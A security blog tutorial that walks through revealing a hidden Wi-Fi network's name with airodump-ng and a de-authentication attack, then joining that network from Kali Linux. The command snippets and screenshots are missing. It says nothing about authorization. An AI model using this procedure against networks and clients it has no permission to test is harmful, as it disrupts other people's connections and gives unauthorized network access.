top of page
Search

Discover And Connect To Hidden Networks Using aircrack-ng

Welcome to this blog. In the previous blog, we learned about the de-authentication attack, and in this blog, we will look at one of the most useful applications of the de-authentication attack, i.e., discovering and connecting to hidden networks.

Requirements

  1. Kali Linux (To know how to install Kali Linux click here)

  2. A wireless adapter that supports monitor mode and packet injection.

Table of Contents

Introduction

Let us suppose you want to connect to an open wifi network near you, but that wifi is hidden. What can you do about it? How will you discover it? This blog answers each of these questions in detail.

What is hidden Wifi?

Well, the simplest answer is: the network that is not detected by your wifi is called hidden wifi. In more technical terms, a hidden wifi is a wifi that does not broadcast its ESSID. However, it still broadcasts its BSSID. In this blog, we will use its BSSID to determine its ESSID and connect to it.

Setup

  1. Make sure you have your wireless adapter in monitor mode. To know how to put your card in monitor mode check this blog.

  2. You must have aircrack-ng installed. To install aircrack-ng in Kali Linux enter the following command.

Discovering The Name Of The Wi-Fi

From the blog about packet sniffing, we know that every network broadcasts its existence by sending beacons. We now know that even if a Wi-Fi is hidden, it still broadcasts its BSSID. Just by using the BSSID, we will figure out its ESSID (the name of the Wi-Fi). Follow the steps below.


Step 1: We need to run airodump-ng against all wifi to find out the BSSID of the network. To use airodump-ng use the following code.

Discovering hidden networks in kali linux

As we can see that the name of the Wi-Fi is hidden. <length: 9> means that the Wi-Fi is hidden and 09 means that the number of characters in the Wi-Fi name is 9.

Step 2: To get a more detailed information about this Wi-Fi we will run airodump-ng for this specific network. To run airodump-ng against this specific Wi-Fi use this code.

You should see something like this:


Discovering connected clients

The highlighted text encapsulates the number of clients connected to this router. The MAC addresses of the connected devices are shown.

Step 3: Now we will use the de-authentication attack which we learnt in the previous blog.When we disconnect one of the devices for a very short period of time, the device will send ESSID packets that contain the name of the Wi-Fi. Airodump-ng will automatically capture this packet and show the name of the Wi-Fi.

To de-authenticate the client use this code.

NOTE: Make sure airodump-ng is running while you execute this code in a separate terminal.

Now you should see something like this:

how to discover a hidden network.

As you can see, we have successfully captured the ESSID of the router and can now connect to it.

How to Connect To Hidden Networks in Kali Linux?

To connect to a hidden Wi-Fi in Kali Linux follow these steps:

Step 1: First, reconnect your Wi-Fi adapter( to enable managed mode).

Step 2: Open Wi-Fi setting by clicking on the top right corner of the screen.

Step 3: Click on the three dots at the top right corner of the screen.


How to connect to a hidden Wi-Fi

Step 4: Click on Connect to Hidden Network button.

Step 5: Enter the network name and then choose security from the dropdown. To check which type of security the router uses, see the ENC section in airodump-ng.

Connecting to hidden Wi-Fi

But what if your Wi-Fi uses WPA or WPA2 personal encryption? How will you break it? Well, that's the blog for another day.

See ya in the next blog.

HAPPY HACKING :)

Comments

IMG-20230206-WA0000.jpg

Hi, thanks for stopping by!

Subscribe to get notified about the latest security update.

Click on Read More to know me better.

Let the posts
come to you.

Thanks for submitting!

  • LinkedIn
  • Instagram
  • Twitter
bottom of page